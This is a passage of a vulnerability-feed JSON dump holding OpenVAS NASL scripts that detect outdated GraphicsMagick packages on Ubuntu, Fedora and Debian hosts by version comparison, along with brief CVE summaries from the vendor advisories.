"2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844305", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844305\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4248-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4248-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005283.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4248-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker could possibly use this issue to cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7c61d08c4f_GraphicsMagick_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874084\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:56:43 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-17783\",\n \"CVE-2017-17782\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-13147\",\n \"CVE-2017-11643\", \"CVE-2017-11641\", \"CVE-2017-11636\", \"CVE-2017-11637\",\n \"CVE-2017-11140\", \"CVE-2017-11139\", \"CVE-2017-11102\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"GraphicsMagick on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7c61d08c4f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M7ZZRPUL2DNIAIFTNGOFAV2VTBMMSRXA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.28~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bfb9835edd_GraphicsMagick_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874085\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:57:22 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-17783\",\n \"CVE-2017-17782\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-13147\",\n \"CVE-2017-11643\", \"CVE-2017-11641\", \"CVE-2017-11636\", \"CVE-2017-11637\",\n \"CVE-2017-11140\", \"CVE-2017-11139\", \"CVE-2017-11102\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"GraphicsMagick on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bfb9835edd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ISKX4WLRTYSRACWKG6AHO35A6HAVWHBB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.28~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:55", "description": "CVE-2017-13776\nCVE-2017-13777\ndenial of service issue in ReadXBMImage()\n\nCVE-2017-12935\nThe ReadMNGImage function in coders/png.c mishandles large MNG\nimages, leading to an invalid memory read in the\nSetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\nissue for data associated with exception reporting.\n\nCVE-2017-12937\nThe ReadSUNImage function in coders/sun.c has a colormap\nheap-based buffer over-read.\n\nCVE-2017-13063\nCVE-2017-13064\nheap-based buffer overflow vulnerability in the function\nGetStyleTokens in coders/svg.c\n\nCVE-2017-13065\nNULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c", "cvss3": {}, "published": "2018-02-07T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1082-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13777", "CVE-2017-12936", "CVE-2017-13776", "CVE-2017-13065", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891082", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891082\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1082-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2017-13776\nCVE-2017-13777\ndenial of service issue in ReadXBMImage()\n\nCVE-2017-12935\nThe ReadMNGImage function in coders/png.c mishandles large MNG\nimages, leading to an invalid memory read in the\nSetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\nissue for data associated with exception reporting.\n\nCVE-2017-12937\nThe ReadSUNImage function in coders/sun.c has a colormap\nheap-based buffer over-read.\n\nCVE-2017-13063\nCVE-2017-13064\nheap-based buffer overflow vulnerability in the function\nGetStyleTokens in coders/svg.c\n\nCVE-2017-13065\nNULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-19T15:01:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-12-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for graphicsmagick USN-4222-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-13775", "CVE-2017-13737", "CVE-2017-12936", "CVE-2017-13776", "CVE-2017-11638", "CVE-2017-11643", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310844278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844278", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844278\");\n script_version(\"2019-12-18T09:57:42+0000\");\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 09:57:42 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-12-17 03:00:55 +0000 (Tue, 17 Dec 2019)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4222-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4222-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-December/005249.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4222-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker could possibly use this issue to cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:36", "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.", "cvss3": {}, "published": "2018-10-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-17783", "CVE-2017-17915", "CVE-2017-10794", "CVE-2017-15277", "CVE-2017-14997", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-10799", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-18229", "CVE-2017-13776", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-11638", "CVE-2017-17782", "CVE-2017-16352", "CVE-2017-17503", "CVE-2017-18231", "CVE-2017-11102", "CVE-2017-18230", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-11139", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-10800", "CVE-2018-9018", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-11140", "CVE-2017-16545", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2018-5685", "CVE-2017-13064", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704321", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4321-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704321\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\",\n \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\",\n \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\",\n \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\",\n \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\",\n \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\",\n \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\",\n \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\",\n \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\",\n \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\",\n \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\",\n \"CVE-2018-9018\");\n script_name(\"Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-16 00:00:00 +0200 (Tue, 16 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4321.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/graphicsmagick\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.30+hg15796-1~deb9u1\", 